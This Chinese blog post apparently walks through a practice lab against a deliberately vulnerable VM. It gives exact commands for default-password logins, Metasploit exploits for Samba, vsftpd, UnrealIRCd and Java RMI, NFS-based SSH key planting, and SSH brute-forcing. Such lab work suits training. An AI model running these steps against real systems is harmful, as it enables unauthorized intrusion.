小白黑客是如何进行漏洞攻防演练的

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129 –u root

2、登录成功,进入MySQL系统

3、测试效果:

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.Use
   exploit/multi/samba/usermap_script,选择漏洞库

3.Set RHOST 192.168.160.131 设置要攻击的机器IP

4.Exploit,开始攻击

5.利用成功,执行uname –a 验证

测试效果:

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use
   exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.160.131

4、利用成功,执行uname –a 验证

5、测试过程:

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use
   exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

  1. Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

  1. 在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启
  2. showmount –e 192.168.26.129 查看其设置的远程目录列表
  3. 输入ssh-keygen 生成RSA公钥
  4. 依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>
   /tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh root@192.168.26.129,实现无密码登录

  1. Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

  1. 输入nmap –sV -O(大写) 192.168.160.131 查看SSh端口是否开启
  2. 开启metasploit framework 框架,依次输入:
  • use auxiliary/scanner/ssh/ssh_login
  • set RHOSTS 192.168.160.131
  • set USERNAME root
  • set PASS_FILE pass.txt(字典文件,需要预先生成)
  • set THREADS 50
  • run

       
专栏
1个月掌握Kali渗透与黑客编程
作者:Kali与编程
188币
269人已购
查看
(0)

相关推荐

  • 如何防御网络攻击(网络安全攻防演练报告)

    如何防御网络攻击(网络安全攻防演练报告)

    手机的攻击手法攻击手机常用的手法就是使用手机病毒.由于受目前手机所处的"硬件环境""软件环境""通信环境""人为环境"限 ...

  • 谷歌公布Windows重大漏洞:允许黑客对本地权限进行升级

    10月末,谷歌安全团队公布了OS X和iOS中的一个发现于9月份的核心漏洞,逼迫苹果推出“紧急更新”进行修补. 现在,谷歌又将炮口对准Windows,该公司提前公布了一个Windows的严重漏洞,此举 ...

  • 堵住Microsoft.NET本地权限提升的漏洞风险

    微软的.NET组件爆出严重的溢出漏洞,只要是安装了.NET组件的操作系统都会受到此漏洞的影响。也就是说,我们用得最多的Windows XP、Win7系统,网站服务器用得最多的Windows 2003, ...

  • Adobe Reader存在严重漏洞 或导致系统崩溃

    北京时间12月7日凌晨消息,Adobe周二发表安全警告称,已经发现有黑客利用Adobe Reader 9.x 中的漏洞对Windows系统发起攻击的状况. 该漏洞的影响范围也正在逐渐扩大,目前包括适用 ...

  • 黑客Web攻击的十大原因

    随着各种基于Internet的安全攻击频发,Web安全已经成为业界的热门话题.本文谈下黑客使用Web进行攻击的十大原因以及抵御Web威胁的十大方法. 黑客使用Web进行攻击的十大原因 1.桌面漏洞 I ...

  • 系统里存在安全漏洞的九大高危区域

    系统里存在安全漏洞的九大高危区域

  • 认识QQ漏洞与分析QQ密码被盗的原因

    目前QQ不单是一款用于聊天的软件,它还具有如游戏.邮箱.网络交易等功能,而这些新增功能也增加了QQ漏洞的数量和种类,其中常见的QQ漏洞种类介绍如下: 操作方法 01 程序漏洞:在使用QQ时,黑客盗号常 ...

  • 电脑总是自动关机

    最近有不少网友反馈经常遇到每隔十几分钟后电脑总是自动关机,去it论坛和问答平台求助咨询为什么总是自动关机,金山网络安全专家指出电脑总是关机的原因大部分是由于硬件散热不均匀和电脑中远程控制病毒导致的,下 ...

  • 解决打开网页慢的原因

    案例 小A同学周末从网上下载一个ps软件,安装一个制图软件后,发现ie主页被修改了,而且手动无法修改回原ie主页,然后使用安全杀毒软件杀毒,没有想到查杀病毒后,打开网页慢了很多。便四处寻找打开网页慢的 ...

  • XP操作系统停止更新后普通用户应该怎么办

      XP操作系统停止更新后普通用户应该怎么办? 仍在使用XP的用户来说,在微软停止对XP提供支持之后,需要一些综合的方案来保护系统安全:当有新的XP漏洞出现,黑客必然会利用漏洞传播木马病毒,对此可选择 ...